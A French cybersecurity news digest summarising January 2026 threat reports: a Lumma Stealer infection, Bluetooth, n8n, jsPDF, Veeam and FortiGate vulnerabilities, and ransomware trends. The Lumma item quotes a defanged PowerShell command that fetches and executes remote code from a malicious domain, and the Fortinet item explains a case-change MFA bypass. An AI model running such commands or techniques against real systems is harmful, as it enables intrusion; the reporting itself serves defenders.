Monde

Source: billet signé par Brad Duncan (publié le 14 janvier 2026). Contexte: l’auteur documente en laboratoire un exemple d’infection Lumma Stealer présentant un comportement post-infection inhabituel qui génère une hausse continue de trafic vers un même domaine C2. Après l’exfiltration des données par Lumma Stealer, l’hôte Windows infecté récupère des instructions depuis un lien Pastebin (hxxps[:]//pastebin[.]com/raw/xRmmdinT) utilisées pour une infection de suivi. Le contenu Pastebin renvoie une commande PowerShell: irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex, entraînant des requêtes HTTPS répétées vers hxxps[:]//fileless-market[.]cc/. ...

Source: COSIC (KU Leuven), 16 janvier 2026. Des chercheurs du groupe COSIC de la KU Leuven présentent “WhisperPair”, une famille d’attaques exploitant une mauvaise implémentation de Google Fast Pair sur de nombreux accessoires audio Bluetooth. Classée critique par Google sous CVE-2025-36911, la faille permet à un attaquant d’hijacker des écouteurs/casques et, dans certains cas, d’en suivre la localisation via le réseau Google Find Hub. Les correctifs dépendent des fabricants d’accessoires et nécessitent une mise à jour du firmware. 🎧🔒 ...

Source: Endor Labs — Analyse technique d’une campagne de supply chain visant l’écosystème des « community nodes » n8n; mise à jour au 2026-01-13 indiquant que la campagne est toujours active. ⚠️ Des attaquants ont publié sur npm des paquets n8n déguisés en intégrations « Google Ads » pour collecter des identifiants OAuth/API via un formulaire de configuration légitime, puis exfiltrer ces secrets lors de l’exécution des workflows vers un serveur sous contrôle adversaire. Cette offensive va au-delà des récentes failles RCE n8n et exploite la confiance accordée aux nœuds communautaires non audités. ...

Selon le blog de SEKOIA, cet article explore Landlock en tant que mécanisme de sécurité et comme source de données utiles à l’ingénierie de détection. Landlock (Linux) comme télémétrie pour la détection Contexte L’équipe Sekoia TDR (Threat Detection & Research) s’intéresse à Landlock, un Linux Security Module (LSM) introduit dans le noyau Linux 5.13. Landlock permet de créer des sandbox applicatives (contrôles d’accès “par processus”), applicables à des processus privilégiés ou non, en complément des mécanismes d’accès systèmes existants (défense en profondeur). ...

Selon IT-Connect (08/01/2026), une vulnérabilité critique CVE-2025-68428 affecte jsPDF côté serveur (Node.js), pouvant entraîner une fuite de données via l’inclusion de fichiers locaux dans les PDF générés, avec un correctif publié en version 4.0.0 le 03/01/2026. Produits et surface affectés : seules les versions Node.js de jsPDF sont touchées, via les fichiers dist/jspdf.node.js et dist/jspdf.node.min.js. Les méthodes concernées sont loadFile, addImage, html et addFont. Nature de la vulnérabilité et impact : le NIST indique que si des chemins non sécurisés sont transmis (ex. premier argument contrôlé par un attaquant) à ces méthodes, il est possible de récupérer le contenu de fichiers arbitraires du système où s’exécute le processus Node, et que ce contenu est inclus tel quel dans les PDF générés. Cela peut mener à une fuite d’informations depuis le serveur 📄➡️🔓. ...

Source : Cyera Research Labs (blog de recherche, 7 janvier 2026). L’article détaille une faille critique dans n8n entraînant une exécution de code à distance non authentifiée et explique la chaîne d’exploitation, l’impact et la correction disponible. 🚨 Problème et impact Vulnérabilité : CVE-2026-21858 (score CVSS 10.0) dans n8n. Type : exécution de code à distance (RCE) non authentifiée via confusion du Content-Type. Impact : prise de contrôle de serveurs n8n localement déployés, estimée à ~100 000 instances affectées. Correctif : mettre à jour en 1.121.0 ou ultérieur; aucun contournement officiel disponible. 🧩 Détails techniques (résumé fidèle) ...

Selon Emsisoft News (Luke Connolly, 7 janvier 2026), l’analyse des données 2025 issues de RansomLook.io et Ransomware.live met en lumière une hausse marquée des victimes de ransomware, la fragmentation de l’écosystème criminel et l’efficacité accrue de l’ingénierie sociale. 📈 Tendances chiffrées. Les victimes « revendiquées » par les groupes passent d’environ 5 400 en 2023 à 8 000+ en 2025 (selon les deux sources). La croissance 2025 sur 2024 atteint +46% (RansomLook) et +33% (Ransomware.live). Le nombre de groupes actifs progresse en parallèle (jusqu’à 126–141 en 2025), avec une moyenne de victimes par groupe restant globalement stable (~60–65 depuis 2023/2024), suggérant que la fragmentation maintient la cadence d’attaques. ...

Selon l’article, dans le contexte d’une intensification des opérations en 2024-2025, un nouveau groupe de ransomware nommé SafePay s’impose comme une menace mondiale majeure. 🔒 SafePay fonctionne à l’opposé des modèles RaaS dominants : le groupe est centralisé et fermé, gardant un contrôle strict sur l’infrastructure, les négociations et les profits. Cette approche OPSEC vise à réduire les risques de fuites de code et d’infiltration par les forces de l’ordre qui ont affecté des groupes comme LockBit et ALPHV. ...

Selon IT-Connect, Veeam a publié des correctifs en ce début janvier 2026 pour quatre vulnérabilités affectant Veeam Backup & Replication 13, issues d’audits internes. Trois d’entre elles permettent une exécution de code à distance (RCE). ⚠️ Détail des failles (CVE, impact, privilèges requis, sévérité, CVSS): CVE-2025-55125: RCE en tant que root via création d’un fichier de configuration de sauvegarde malveillant — Prérequis: Backup/Tape Operator — Élevée, 7.2 CVE-2025-59468: RCE en tant qu’utilisateur postgres via envoi d’un paramètre de mot de passe malveillant — Prérequis: Backup Administrator — Moyenne, 6.7 CVE-2025-59469: Écriture de fichiers arbitraires en tant que root — Prérequis: Backup/Tape Operator — Élevée, 7.2 CVE-2025-59470: RCE en tant qu’utilisateur postgres via des paramètres d’ordre ou d’intervalle malveillants — Prérequis: Backup/Tape Operator — Élevée, 9.0 (CVSS) Pour la CVE-2025-59470, malgré un score CVSS 9.0, Veeam abaisse la sévérité à Élevée car: 1) l’exploitation exige déjà le rôle Operator, conférant de forts privilèges; 2) l’application des bonnes pratiques de sécurité Veeam réduit la probabilité d’exploitation. ...

Cyber Security News rapporte début janvier 2026 que The Shadowserver Foundation a ajouté la vulnérabilité Fortinet CVE-2020-12812 à son rapport quotidien des services HTTP vulnérables, confirmant plus de 10 000 pare-feu FortiGate exposés dans le monde, alors que Fortinet a reconnu une exploitation active fin 2025. La faille CVE-2020-12812 (score CVSS 7.5 – High) affecte les portails FortiOS SSL VPN (versions 6.4.0, 6.2.0 à 6.2.3, et 6.0.9 et antérieures) et permet un contournement du MFA. Un attaquant peut se connecter en modifiant simplement la casse du nom d’utilisateur (ex. “user” → “User”) en raison d’un décalage de sensibilité à la casse entre FortiGate (utilisateurs locaux sensibles à la casse) et des serveurs LDAP tels qu’Active Directory (souvent insensibles à la casse), ce qui autorise l’authentification par appartenance à un groupe sans demander le deuxième facteur. La vulnérabilité figure depuis 2021 au catalogue CISA KEV après un usage par des acteurs de ransomware. ...